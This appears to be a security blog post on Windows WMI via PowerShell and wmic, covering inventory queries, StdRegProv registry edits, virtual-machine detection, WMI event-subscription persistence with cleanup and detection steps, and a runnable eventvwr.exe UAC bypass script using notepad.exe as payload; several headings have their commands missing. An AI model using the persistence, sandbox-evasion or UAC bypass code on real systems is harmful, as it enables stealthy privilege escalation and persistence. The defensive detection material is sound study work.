WMI Registry | WMI Persistence using wmic.exe
What is WMI?
WMI is the Microsoft implementation of Web-Based Enterprise Management (WBEM), with some enhancements added in its initial version. WBEM is an industry initiative to develop a standard technology for accessing management information in an enterprise environment, covering not only Windows but many other kinds of devices such as routers, switches and storage arrays. WMI uses the Common Information Model (CIM) industry standard to represent systems, applications, networks, devices and other managed components. CIM is developed and maintained by the Distributed Management Task Force (DMTF).
That all sounds nice, but when Microsoft developed the first versions of WMI they built them on DCOM (Distributed Component Object Model), a proprietary Microsoft technology, so standards and cross-platform compatibility took a back seat at the time. In more recent versions of the operating system, with Windows Management Framework 2.0 and above, Microsoft started to include more of the standards and shifted to the SOAP-based WS-Management protocol, carried by WinRM (Windows Remote Management).
We can look at WMI as a collection of objects that provide access to different parts of the operating system; just as with PowerShell objects, each has properties, methods and events. These objects are defined in MOF (Managed Object Format) files saved in %windir%\System32\wbem with the extension .mof. The MOF files are loaded by what is called a Provider; when the Provider is registered, it loads the object definitions into the current WMI Namespace. A Namespace can be seen as a file-system-like structure that organizes the objects by function. Inside each namespace the objects exist, as in PowerShell, as Class Instances, and each of these is populated with OS and application information as the system runs, so the classes always hold the latest information.
Namespaces are organized hierarchically, with \root as the top level for all other namespaces. The default namespace, where most of the other namespaces and classes are located, is root\CIMv2 on Windows kernel 6.x; on kernel 5.x it is Default\CIMv2. Some namespaces are installed by default and others are only available when specific applications are installed.
In summary, each Namespace contains Classes, and these have:
- Methods: actions that can be taken.
- Properties: information that can be retrieved.
- Instances: instances of the class objects (services, processes, disks), each with its own methods and properties.
- Events: actions that WMI can monitor for, taking action when they happen.
Collecting data
Note:
The default wmic output is not laid out the same way as PowerShell's, so a parameter specifying the output format has to be added.
To display the results line by line, the way PowerShell echoes them, add the following parameter:
Likewise, other queries made through PowerShell's WMI query methods can be carried out with wmic, for example:
PowerShell command:
Corresponding wmic command:
Writing the output to a file:
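As an added example (not code from the original post), the following PowerShell script runs the same inventory query twice: once through the CIM cmdlets, which return objects, and once through wmic.exe, using /format:list so that each property lands on its own line the way PowerShell echoes it, and /output: to send the result to a file. The output path is a hypothetical choice. It assumes Windows PowerShell 5.1 with wmic.exe present; on current Windows 11 builds wmic.exe is deprecated and only available as an optional Feature on Demand.

```powershell
# Added example: the same WMI queries done with PowerShell's CIM cmdlets and
# with wmic.exe, including line-style output (/format:list) and writing the
# results to a file (/output:). Assumes Windows PowerShell 5.1 and wmic.exe;
# the output path is a hypothetical choice for this example.

# PowerShell side: OS and processor information as objects
function Get-HostInventory {
    $os  = Get-CimInstance -ClassName Win32_OperatingSystem
    $cpu = Get-CimInstance -ClassName Win32_Processor
    [pscustomobject]@{
        Caption  = $os.Caption
        Version  = $os.Version
        LastBoot = $os.LastBootUpTime
        CpuName  = ($cpu | Select-Object -First 1).Name
        Cores    = ($cpu | Measure-Object -Property NumberOfCores -Sum).Sum
    }
}

# wmic side: the same data. The default table layout is hard to read and its
# columns do not line up, so /format:list prints one "Property=Value" per line,
# which matches how PowerShell displays the object.
function Get-HostInventoryWmic {
    param([string]$OutFile = "$env:TEMP\wmic_inventory.txt")   # hypothetical path

    # Equivalent of Get-CimInstance Win32_OperatingSystem | Select Caption,Version,LastBootUpTime
    $osLines  = & wmic.exe os get Caption,Version,LastBootUpTime /format:list
    # Equivalent of Get-CimInstance Win32_Processor | Select Name,NumberOfCores
    $cpuLines = & wmic.exe cpu get Name,NumberOfCores /format:list

    # /output: is a global switch, so it comes before the alias; it redirects the
    # result to a file instead of the console (/append: would add to an existing file)
    & wmic.exe /output:"$OutFile" os get Caption,Version /format:list

    # Parse the "Property=Value" lines back into a hashtable for further use.
    # wmic lines carry an extra carriage return, hence the Trim().
    $parsed = @{}
    foreach ($line in @($osLines) + @($cpuLines)) {
        if ($line -match '^(\w+)=(.*)$') { $parsed[$Matches[1]] = $Matches[2].Trim() }
    }
    [pscustomobject]@{
        Parsed  = $parsed
        OutFile = $OutFile
        # wmic writes the file as Unicode (UTF-16) with a byte-order mark, which
        # Get-Content detects; blank separator lines are dropped here
        Saved   = @(Get-Content -Path $OutFile | Where-Object { $_.Trim() })
    }
}

Get-HostInventory
Get-HostInventoryWmic | Format-List
```

The parsing step is the practical reason to prefer /format:list over the default table when wmic output has to be consumed by another script: the key/value lines survive any column width.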
Registry operations
The PowerShell code is as follows:
The complete wmic code is as follows:
Enumerating subkeys
Note:
"Method execution successful" does not mean the correct result has been returned; the parameters still have to be filled in correctly. In Figure 2-6 a parameter was deliberately left out: wmic still prints "Method execution successful", but the returned result is an error.
Enumerating the values of a specified key:
Getting the string data of a specified value:
Creating a subkey:
Note:
Mind permissions here: writing under HKEY_LOCAL_MACHINE (&H80000002) requires administrator rights.
Setting a string named value:
Note: if the named value does not exist it is created; if it already exists it is modified.
Deleting a subkey:
Deleting a named value:
Note:
The parameters above are described in the StdRegProv reference: https://msdn.microsoft.com/en-us/library/aa393664(VS.85).aspx
In the argument written as ^&H80000002, the caret escapes the ampersand for cmd.exe; the &H8000000x values are the predefined root-key (hive) handles:
&H80000000 HKEY_CLASSES_ROOT
&H80000001 HKEY_CURRENT_USER
&H80000002 HKEY_LOCAL_MACHINE
&H80000003 HKEY_USERS
&H80000005 HKEY_CURRENT_CONFIG
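As an added example (not code from the original post), the StdRegProv operations listed above are driven from PowerShell with Invoke-CimMethod. Named arguments are used so that parameter order cannot be mixed up, and every call checks ReturnValue, which is the point of the note above: the method can "execute successfully" while the registry operation itself fails. The demo key HKCU\Software\WmiRegDemo is a hypothetical, disposable choice, and HKCU is used so the example runs without administrator rights. It assumes Windows PowerShell 5.1.

```powershell
# Added example: the StdRegProv operations from this section via Invoke-CimMethod.
# The demo key HKCU\Software\WmiRegDemo is hypothetical and removed at the end.
# The equivalent wmic form is
#   wmic /namespace:\\root\default class StdRegProv call <Method> <arguments>
# with the hive handle passed as ^&H8000000x.

$HKCU = [uint32]0x80000001   # &H80000001 in the wmic commands
$HKLM = [uint32]0x80000002   # &H80000002; writing here needs administrator rights

# Thin wrapper around Invoke-CimMethod. A non-throwing call here, like
# "Method execution successful" from wmic, only means the method ran; the real
# status is the Win32 error code in ReturnValue (0 = success,
# 2 = key or value not found, 5 = access denied), so it is checked every time.
function Invoke-RegProv {
    param([string]$Method, [hashtable]$Arguments)
    $r = Invoke-CimMethod -Namespace 'root\default' -ClassName StdRegProv `
                          -MethodName $Method -Arguments $Arguments
    if ($r.ReturnValue -ne 0) {
        throw "StdRegProv.$Method failed with Win32 error $($r.ReturnValue)"
    }
    $r
}

$sub = 'Software\WmiRegDemo'

# Create a subkey
Invoke-RegProv CreateKey @{ hDefKey = $HKCU; sSubKeyName = $sub } | Out-Null

# Set a string named value: created if missing, overwritten if present
Invoke-RegProv SetStringValue @{ hDefKey = $HKCU; sSubKeyName = $sub
                                 sValueName = 'Demo'; sValue = 'hello' } | Out-Null

# Enumerate subkeys (sNames) and the values of a key (sNames plus Types)
$keys = Invoke-RegProv EnumKey    @{ hDefKey = $HKCU; sSubKeyName = 'Software' }
$vals = Invoke-RegProv EnumValues @{ hDefKey = $HKCU; sSubKeyName = $sub }
"$(@($keys.sNames).Count) subkeys under HKCU\Software; values in demo key: $($vals.sNames -join ', ')"

# Get the string data of a value; the result comes back in sValue
$read = Invoke-RegProv GetStringValue @{ hDefKey = $HKCU; sSubKeyName = $sub; sValueName = 'Demo' }
"Demo = $($read.sValue)"

# A wrong value name still "executes successfully" as far as wmic is concerned,
# but ReturnValue is 2 (ERROR_FILE_NOT_FOUND); the wrapper turns that into an error
try {
    Invoke-RegProv GetStringValue @{ hDefKey = $HKCU; sSubKeyName = $sub; sValueName = 'Missing' } | Out-Null
} catch { "Expected failure: $_" }

# Delete the named value, then the (now empty) subkey
Invoke-RegProv DeleteValue @{ hDefKey = $HKCU; sSubKeyName = $sub; sValueName = 'Demo' } | Out-Null
Invoke-RegProv DeleteKey   @{ hDefKey = $HKCU; sSubKeyName = $sub } | Out-Null
```

Swapping $HKCU for $HKLM in the CreateKey or SetStringValue calls reproduces the permission note above: from a non-elevated prompt the method still runs, but ReturnValue is 5 (access denied).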
Virtual machine detection
Check TotalPhysicalMemory and NumberOfLogicalProcessors:
List the current processes:
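As an added example (not code from the original post), the two checks named above, memory and logical processor count from Win32_ComputerSystem and the running process list from Win32_Process, are gathered through WMI and folded into a simple virtual-machine verdict; the manufacturer and model strings of common hypervisors are added as a further signal. The thresholds and process-name lists are heuristics chosen for this example, not values from the post. It assumes Windows PowerShell 5.1.

```powershell
# Added example: VM detection from the WMI data discussed in this section.
# wmic equivalents of the two queries:
#   wmic computersystem get Manufacturer,Model,TotalPhysicalMemory,NumberOfLogicalProcessors /format:list
#   wmic process get Name,ProcessId /format:list
# Thresholds and name lists below are heuristics chosen for this example.
function Test-VirtualMachine {
    param(
        [uint64]$MinPhysicalMemoryGB = 4,   # analysis sandboxes are often given 1-2 GB
        [int]$MinLogicalProcessors  = 2     # and a single vCPU
    )
    $cs    = Get-CimInstance -ClassName Win32_ComputerSystem
    $procs = Get-CimInstance -ClassName Win32_Process | Select-Object -ExpandProperty Name

    $memGB = [math]::Round($cs.TotalPhysicalMemory / 1GB, 1)
    $indicators = @()

    if ($memGB -lt $MinPhysicalMemoryGB) { $indicators += "low memory: $memGB GB" }
    if ($cs.NumberOfLogicalProcessors -lt $MinLogicalProcessors) {
        $indicators += "few logical processors: $($cs.NumberOfLogicalProcessors)"
    }

    # Hypervisor fingerprints in the SMBIOS strings exposed by Win32_ComputerSystem
    $hw = "$($cs.Manufacturer) $($cs.Model)"
    if ($hw -match 'VMware|VirtualBox|innotek|QEMU|KVM|Xen|Virtual Machine|Parallels') {
        $indicators += "hardware string: $hw"
    }

    # Guest-tools / agent processes in the current process list
    $toolProcs = @('vmtoolsd.exe', 'vmwaretray.exe', 'vmwareuser.exe', 'VBoxService.exe',
                   'VBoxTray.exe', 'vmsrvc.exe', 'vmusrvc.exe', 'prl_tools.exe',
                   'xenservice.exe', 'qemu-ga.exe')
    $found = @($procs | Where-Object { $toolProcs -contains $_ } | Sort-Object -Unique)
    if ($found.Count -gt 0) { $indicators += "guest tools running: $($found -join ', ')" }

    [pscustomobject]@{
        MemoryGB          = $memGB
        LogicalProcessors = $cs.NumberOfLogicalProcessors
        Hardware          = $hw
        Indicators        = $indicators
        LikelyVM          = ($indicators.Count -gt 0)
    }
}

Test-VirtualMachine | Format-List
```

None of these signals is conclusive on its own: small physical hosts exist, and guest tools can be absent or renamed, which is why the result lists the individual indicators rather than only a yes/no.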
WMI Persistence
The complete PowerShell code is as follows:
$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\notepad.exe'
# Event filter: polls Win32_PerfFormattedData_PerfOS_System every 60 seconds, so the trigger fires roughly once a minute
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
# Event consumer: the command to run when the filter fires
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
# Binding: ties the filter to the consumer; creating it is what activates the subscription
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
The same steps, carried out with wmic:
Create an __EventFilter instance
Create an __EventConsumer instance (here a CommandLineEventConsumer)
Create a __FilterToConsumerBinding instance
List the __EventFilter and __EventConsumer instances
Filters:
Event Consumers:
Event Bindings:
Viewing them with PowerShell:
Filters:
Event Consumers:
Event Bindings:
Removing all instances
Filters:
Event Consumers:
Event Bindings:
Note:
When creating the binding with wmic, the double quotes around "BotFilter82" in the Filter parameter must be changed to single quotes.
Removing them with PowerShell:
Filters:
Event Consumers:
Event Bindings:
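As an added example (not code from the original post or from the exploit-monday article it follows), the following script enumerates every permanent WMI event subscription in root\subscription, resolves each binding to its filter (the WQL trigger) and consumer (what runs), and removes one subscription by name, deleting the binding first so nothing is left dangling. It works as-is against the BotFilter82/BotConsumer23 names used above; other names are the caller's choice. It assumes Windows PowerShell 5.1 (Get-WmiObject/Remove-WmiObject) and administrator rights, which modifying root\subscription requires.

```powershell
# Added example: list and remove permanent WMI event subscriptions.
# wmic equivalents of the listing step:
#   wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter GET Name,Query
#   wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer GET Name,ExecutablePath,CommandLineTemplate
#   wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding GET Filter,Consumer
function Get-WmiSubscription {
    $ns = 'root\subscription'
    foreach ($b in Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding) {
        # Filter and Consumer are object paths such as
        # \\.\root\subscription:__EventFilter.Name="BotFilter82"; [wmi] dereferences them
        $filter   = [wmi]$b.Filter
        $consumer = [wmi]$b.Consumer
        # Different consumer classes keep their action in different properties
        $action = switch ($consumer.__CLASS) {
            'CommandLineEventConsumer'  { "$($consumer.ExecutablePath) $($consumer.CommandLineTemplate)".Trim() }
            'ActiveScriptEventConsumer' { $consumer.ScriptText }
            default                     { $consumer.__PATH }
        }
        [pscustomobject]@{
            Filter        = $filter.Name
            Query         = $filter.Query
            ConsumerClass = $consumer.__CLASS
            Consumer      = $consumer.Name
            Action        = $action
        }
    }
}

function Remove-WmiSubscription {
    param([Parameter(Mandatory)][string]$FilterName,
          [Parameter(Mandatory)][string]$ConsumerName)
    $ns = 'root\subscription'
    # 1. the binding(s) that reference this filter, matched on the object-path text
    Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -like "*__EventFilter.Name=`"$FilterName`"*" } |
        Remove-WmiObject
    # 2. the filter itself
    Get-WmiObject -Namespace $ns -Class __EventFilter -Filter "Name='$FilterName'" | Remove-WmiObject
    # 3. the consumer; querying the abstract __EventConsumer class returns every consumer subclass
    Get-WmiObject -Namespace $ns -Class __EventConsumer -Filter "Name='$ConsumerName'" | Remove-WmiObject
}

# Review what is registered, then clean up the example subscription from above.
# The default "SCM Event Log Filter" binding is Microsoft's own and is expected.
Get-WmiSubscription | Format-Table -AutoSize
Remove-WmiSubscription -FilterName 'BotFilter82' -ConsumerName 'BotConsumer23'
```

For detection rather than cleanup, the same creation steps are logged: Sysmon events 19, 20 and 21 record new filters, consumers and bindings, and on Windows 10 / Server 2016 and later the Microsoft-Windows-WMI-Activity/Operational log writes event 5861 for each new permanent subscription.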
Fileless UAC bypass using eventvwr.exe and registry hijacking
Some of the wmic operations above require administrator rights, so a recently published UAC bypass technique is added here.
Reference:
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
Author:
Matt Nelson @enigma0x3
Principle
When eventvwr.exe starts, it first looks up the registry location HKCU\Software\Classes\mscfile\shell\open\command. If that is empty, it then looks up HKCR\mscfile\shell\open\command (whose default value is %SystemRoot%\system32\mmc.exe "%1" %*), starts mmc.exe with high privileges and finally opens eventvwr.msc.
So if a payload is written to HKCU\Software\Classes\mscfile\shell\open\command, that preset payload is executed, with eventvwr.exe's elevated privileges, at the point where mmc.exe would be started.
The most important point: modifying the HKCU\Software\Classes\mscfile\shell\open\command key only requires normal user privileges, because HKCU is writable by the user.
Microsoft fixed this lookup in Windows 10 version 1703, so the bypass only applies to earlier releases.
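As an added example (not code from the original post or from enigma0x3's write-up), the registry side of the eventvwr.exe hijack is done here through StdRegProv, the same WMI class used for the registry operations earlier on this page, together with a check a defender can run for the hijack key. The payload is notepad.exe, a harmless stand-in chosen for this example. It assumes Windows PowerShell 5.1, a normal (non-elevated) user, and a Windows build from before the 1703 fix; on patched systems the key is written and removed but eventvwr.exe ignores it.

```powershell
# Added example: eventvwr.exe registry hijack via StdRegProv, plus a check for it.
# notepad.exe is a benign stand-in payload chosen for this example.

$HKCU = [uint32]0x80000001
$Sub  = 'Software\Classes\mscfile\shell\open\command'
$RegProv = @{ Namespace = 'root\default'; ClassName = 'StdRegProv' }

# Defender-side check: a normal user profile has no HKCU\Software\Classes\mscfile
# key at all, so ReturnValue 2 (not found) here is the expected, clean state.
# An empty sValueName addresses the (Default) value, which is what the shell executes.
function Test-MscFileHijack {
    $r = Invoke-CimMethod @RegProv -MethodName GetStringValue `
           -Arguments @{ hDefKey = $HKCU; sSubKeyName = $Sub; sValueName = '' }
    if ($r.ReturnValue -eq 0) {
        [pscustomobject]@{ Hijacked = $true;  Command = $r.sValue }
    } else {
        [pscustomobject]@{ Hijacked = $false; Command = $null }
    }
}

# The hijack: write the command eventvwr.exe reads from HKCU before falling
# back to HKCR, start eventvwr.exe so the high-integrity launch picks it up,
# then remove the keys again so the profile is left as it was.
function Invoke-EventvwrHijack {
    param([string]$Payload = 'C:\Windows\System32\notepad.exe')

    $r = Invoke-CimMethod @RegProv -MethodName CreateKey -Arguments @{ hDefKey = $HKCU; sSubKeyName = $Sub }
    if ($r.ReturnValue -ne 0) { throw "CreateKey failed with Win32 error $($r.ReturnValue)" }

    $r = Invoke-CimMethod @RegProv -MethodName SetStringValue `
           -Arguments @{ hDefKey = $HKCU; sSubKeyName = $Sub; sValueName = ''; sValue = $Payload }
    if ($r.ReturnValue -ne 0) { throw "SetStringValue failed with Win32 error $($r.ReturnValue)" }

    try {
        Start-Process -FilePath "$env:windir\System32\eventvwr.exe"
        Start-Sleep -Seconds 5     # give eventvwr.exe time to read the key
    } finally {
        # Clean up leaf-to-root; DeleteKey only removes a key without subkeys
        foreach ($k in 'Software\Classes\mscfile\shell\open\command',
                       'Software\Classes\mscfile\shell\open',
                       'Software\Classes\mscfile\shell',
                       'Software\Classes\mscfile') {
            Invoke-CimMethod @RegProv -MethodName DeleteKey -Arguments @{ hDefKey = $HKCU; sSubKeyName = $k } | Out-Null
        }
    }
}

Test-MscFileHijack          # Hijacked = False on a clean profile
Invoke-EventvwrHijack
Test-MscFileHijack          # False again after cleanup
```

The cleanup in the finally block is what makes the technique "fileless" in practice: nothing is dropped on disk, and after the run the only trace is the registry activity itself, so monitoring writes to HKCU\Software\Classes\*\shell\open\command is the corresponding detection.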
Reference
http://www.exploit-monday.com/2016/08/wmi-persistence-using-wmic.html